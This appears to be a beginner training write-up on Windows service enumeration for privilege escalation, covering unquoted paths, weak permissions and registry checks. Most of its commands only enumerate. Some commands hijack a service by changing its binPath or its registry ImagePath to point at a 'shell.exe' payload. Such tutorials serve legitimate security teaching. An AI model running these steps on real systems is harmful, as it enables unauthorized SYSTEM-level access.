Windows Service Enumeration

beginner25 minWriteup

Finding misconfigured services

Learning Objectives

  • Enumerate Windows services
  • Check service permissions
  • Identify vulnerable services
  • Find unquoted service paths

Windows services are background programs that run with specific privileges. Many run as SYSTEM - the highest Windows privilege level. If a service is misconfigured, we can hijack it to run our code as SYSTEM. Service exploitation is one of the most reliable Windows privilege escalation methods.

Think of services like robots in a factory. They do specific jobs, often with master keys (SYSTEM access). If we can reprogram a robot, it will use its master key to do our bidding. The key is finding robots we can modify.

High Success Rate

Service-based attacks are common in both CTFs and real environments. Always enumerate services thoroughly - you'll often find an easy path to SYSTEM.

Listing Services

batch
1REM List all running services
2sc query
3net start
4 
5REM List ALL services (running and stopped)
6sc query state= all
7 
8REM Note: space after = is required!
9sc query state= all type= service
10 
11REM Get service details
12sc qc ServiceName
13REM Shows: binary path, start type, service account
14 
15REM Example output:
16REM [SC] QueryServiceConfig SUCCESS
17REM
18REM SERVICE_NAME: VulnService
19REM         TYPE               : 10  WIN32_OWN_PROCESS
20REM         START_TYPE         : 2   AUTO_START
21REM         ERROR_CONTROL      : 1   NORMAL
22REM         BINARY_PATH_NAME   : C:Program FilesVulnerableservice.exe
23REM         LOAD_ORDER_GROUP   :
24REM         TAG                : 0
25REM         DISPLAY_NAME       : Vulnerable Service
26REM         DEPENDENCIES       :
27REM         SERVICE_START_NAME : LocalSystem

WMIC for Service Enumeration

batch
1REM Get all services with details
2wmic service get name,displayname,pathname,startmode
3 
4REM Format as list for readability
5wmic service get name,pathname,startmode /format:list
6 
7REM Filter for specific properties
8wmic service where 606070;">#a5d6ff;">"StartMode='Auto'" get name,pathname
9 
10REM Find services running as SYSTEM
11wmic service get name,startname,pathname | findstr /i 606070;">#a5d6ff;">"LocalSystem"
12 
13REM Export to file for analysis
14wmic service get name,displayname,pathname,startmode > services.txt

Look for LocalSystem

Services running as LocalSystem, NT AUTHORITY\SYSTEM, or LocalService are your targets. Exploiting these = SYSTEM shell.

Service Vulnerability Types

1Service Privilege Escalation Vectors:
2├── Unquoted Service Paths
3│   └── Path with spaces, not quoted
4│   └── Windows searches for binaries in order
5│   └── Example: C:Program FilesMy Appservice.exe
6│   └── Exploit: Place malicious C:Program.exe
7
8├── Weak Binary Permissions
9│   └── Service binary is writable by us
10│   └── Replace binary with malicious one
11│   └── Restart service = code execution
12
13├── Weak Service Configuration
14│   └── We can modify service properties
15│   └── Change BINARY_PATH_NAME to our payload
16│   └── Restart service = code execution
17
18├── DLL Hijacking
19│   └── Service loads DLL from writable location
20│   └── Place malicious DLL there
21│   └── Service loads our DLL = code execution
22
23└── Registry Permissions
24    └── Service config in registry is writable
25    └── Modify ImagePath to our payload
26    └── Restart service = code execution

Finding Unquoted Paths

batch
1REM Find unquoted service paths
2wmic service get name,displayname,pathname,startmode | findstr /i 606070;">#a5d6ff;">"auto" | findstr /i /v "c:\windows\\" | findstr /i /v """"
3 
4REM PowerShell method (run in PowerShell)
5Get-WmiObject win32_service | Select-Object Name, PathName, StartMode | Where-Object {$_.PathName -like 606070;">#a5d6ff;">"* *"} | Format-List
6 
7REM What makes a path vulnerable:
8REM 1. Contains spaces: C:\Program Files\App\svc.exe
9REM 2. Not quoted: C:\Program Files\App\svc.exe
10REM    vs safe: 606070;">#a5d6ff;">"C:\Program Files\App\svc.exe"
11 
12REM Why it matters:
13REM Windows parses unquoted paths with spaces:
14REM C:\Program Files\My App\service.exe
15REM Windows tries (in order):
16REM 1. C:\Program.exe
17REM 2. C:\Program Files\My.exe
18REM 3. C:\Program Files\My App\service.exe
19REM If we can write to any of those locations, we win!

Common Unquoted Paths

Third-party software in C:\Program Files is the most common source of unquoted paths. Default Windows services are typically quoted.

Checking Permissions

batch
1REM Check binary permissions with icacls
2icacls 606070;">#a5d6ff;">"C:Program FilesVulnerableservice.exe"
3REM Look for: (F)ull, (M)odify, (W)rite for your user/group
4 
5REM Check directory permissions
6icacls 606070;">#a5d6ff;">"C:Program FilesVulnerable"
7 
8REM Using accesschk from Sysinternals
9accesschk.exe /accepteula -uwcqv 606070;">#a5d6ff;">"Authenticated Users" *
10accesschk.exe -uwcqv 606070;">#a5d6ff;">"Users" *
11accesschk.exe -uwcqv %username% *
12 
13REM Check specific service permissions
14accesschk.exe -uwcqv 606070;">#a5d6ff;">"VulnService"
15REM Shows: SERVICE_ALL_ACCESS, SERVICE_CHANGE_CONFIG, etc.
16 
17REM Check service binary permissions
18accesschk.exe -wvu 606070;">#a5d6ff;">"C:Program FilesVulnerableservice.exe"
19 
20REM Check if you can start/stop service
21accesschk.exe -ucqv VulnService
22 
23REM PowerShell alternative
24Get-Acl 606070;">#a5d6ff;">"C:Program FilesVulnerableservice.exe" | Format-List

Permission Meanings

1ICACLS Permission Flags:
2├── F  - Full Control (read, write, execute, modify, delete)
3├── M  - Modify (read, write, execute, delete)
4├── RX - Read and Execute
5├── R  - Read only
6├── W  - Write only
7└── D  - Delete
8 
9Dangerous Permissions:
10├── (F) or (M) on service binary = can replace binary
11├── (F) or (M) on directory = can add files (DLL hijack)
12├── SERVICE_CHANGE_CONFIG = can modify service path
13└── SERVICE_ALL_ACCESS = full control of service
14 
15User Groups to Check:
16├── Your username
17├── Users
18├── Authenticated Users
19├── Everyone
20└── BUILTINUsers

Service Configuration Permissions

batch
1REM Check if we can modify service configuration
2accesschk.exe -uwcqv 606070;">#a5d6ff;">"Authenticated Users" * /accepteula
3accesschk.exe -uwcqv 606070;">#a5d6ff;">"Everyone" * /accepteula
4 
5REM Look for services with:
6REM RW  [service_name]
7REM SERVICE_ALL_ACCESS
8REM SERVICE_CHANGE_CONFIG
9 
10REM Example output:
11REM VulnService
12REM   RW NT AUTHORITYAuthenticated Users
13REM   SERVICE_ALL_ACCESS
14 
15REM This means we can modify the service!
16REM Change binary path to our payload:
17sc config VulnService binPath= 606070;">#a5d6ff;">"C:	empshell.exe"
18 
19REM Query to verify change
20sc qc VulnService

Restart Permissions

Even if you can modify a service, you need restart permissions or must wait for system reboot. Check: accesschk.exe -ucqv ServiceName for SERVICE_START and SERVICE_STOP.

Registry Service Checks

batch
1REM Services are configured in registry
2REM HKLMSYSTEMCurrentControlSetServices[ServiceName]
3 
4REM Check registry permissions
5accesschk.exe -kvuqsw hklmSystemCurrentControlSetservices
6 
7REM Or specific service
8reg query HKLMSYSTEMCurrentControlSetServicesVulnService
9 
10REM Check ImagePath value
11reg query HKLMSYSTEMCurrentControlSetServicesVulnService /v ImagePath
12 
13REM If we can write to registry:
14reg add HKLMSYSTEMCurrentControlSetServicesVulnService /v ImagePath /t REG_EXPAND_SZ /d 606070;">#a5d6ff;">"C:	empshell.exe" /f

Service Enumeration Methodology

Service Enumeration Flow

1
List Serviceswmic service get name,pathname,startmode
2
Find SYSTEMFilter for services running as LocalSystem
3
Unquoted PathsCheck for spaces without quotes
4
Binary Permsicacls on each service binary
5
Config Permsaccesschk for SERVICE_CHANGE_CONFIG
6
Restart CheckVerify we can restart the service

Knowledge Check

Quick Quiz
Question 1 of 3

What makes a service path vulnerable to unquoted path exploitation?

Challenges

Find Vulnerable Services

Challenge
🔥 intermediate

Enumerate all services on a Windows machine and identify at least one service with: unquoted path, weak binary permissions, or modifiable configuration.

Need a hint? (4 available)

Key Takeaways

  • Focus on services running as LocalSystem (SYSTEM account)
  • Unquoted paths with spaces = potential hijacking
  • Check binary permissions with icacls
  • SERVICE_CHANGE_CONFIG lets you modify the binary path
  • You need restart permission or wait for reboot to trigger exploit
  • accesschk.exe is essential for permission enumeration